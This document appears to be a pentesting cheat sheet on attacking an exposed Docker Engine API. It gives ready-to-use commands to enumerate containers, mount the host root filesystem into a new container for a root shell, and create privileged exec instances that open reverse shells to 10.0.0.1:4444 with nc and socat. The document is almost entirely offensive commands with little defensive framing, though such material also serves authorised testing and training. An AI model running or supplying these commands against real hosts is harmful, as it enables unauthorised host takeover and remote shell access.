# Docker Engine API Pentesting The Docker Engine API is a RESTfull API accessed by an HTTP client. The default ports are 2375, 2376. The socket file is located at /var/run/docker.sock. ### Enumeration ```shellscript curl :2375/containers/json # The specific container curl :2375/containers//json # Logs curl :2375/containers//logs?stderr=1&stdout=1 # Inpsect changes curl :2375/containers//changes ``` ### Privilege Escalation from Docker Image We may be able to get a root shell from remote Docker images. #### 1. Check if Docker is Running in Local Machine In local machine, check if docker is running. ```shellscript sudo systemctl status docker ``` If the docker is not running, start it. ```shellscript sudo systemctl stop docker sudo systemctl start docker ``` #### 2. List Remote Docker Images We need to find what images exist in target Docker API. ```shellscript docker -H :2375 images ``` #### 3. Get a Shell After getting an image, we can use it to create a new container and run with executing `sh`. ```shellscript docker -H :2375 run -v /:/mnt --rm -it chroot /mnt sh ``` Now we should get a root shell.
### Remote Code Execution (RCE) Reference: We might be able to execute remote code by create a new container image using the existing one. #### 1. Check the Image Name First we need to find the existing container image and the name of it. ```shellscript curl :2375/containers/json curl :2375/containers//json ``` #### 2. Create/Start a New Container If we found the container image name, prepare a new container configuration named “image.json”. ```shellscript { "Image": "sweettoothinc:latest", "Cmd": ["/bin/bash"], "Binds": ["/:/mnt:rw"] } ``` Then create a new container using Docker Engine API. ```shellscript curl -X POST -H "Content-Type: application/json" -d @image.json :2375/containers/create ``` We get the new container ID, so copy it. After that, start the new container. ``` curl -X POST :2375/containers//start ``` #### 3. Create a New Exec Instance Next create a exec instance to reverse shell. * **Ncat** ``` curl -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true, "AttachStdout": true, "AttachStderr": true, "Cmd": ["nc", "10.0.0.1", "4444", "-e", "/bin/bash"], "DetachKeys": "ctrl-p,ctrl-q", "Privileged": true, "Tty": true}' :2375/containers//exec ``` * **Socat** ``` curl -X POST -H "Content-Type: application/json" --data-binary '{"AttachStdin": true, "AttachStdout": true, "AttachStderr": true, "Cmd": ["socat", "TCP:10.0.0.1:4444", "EXEC:sh"], "DetachKeys": "ctrl-p,ctrl-q", "Privileged": true, "Tty": true}' :2375/containers//exec ``` We get a exec ID, so copy it. #### 4. Start an Exec Instance & Reverse Shell Start a listener in local machine. ``` nc -lvnp 4444 ``` Now start an exec instance and get a shell. ``` curl -X POST -H "Content-Type: application/json" --data-binary '{"Detach": false, "Tty": false}' :2375/exec//start ``` We should get a shell. ### References * [Docker Docs](https://docs.docker.com/engine/api/v1.24/) * [dejandayoff](https://dejandayoff.com/the-danger-of-exposing-docker.sock/)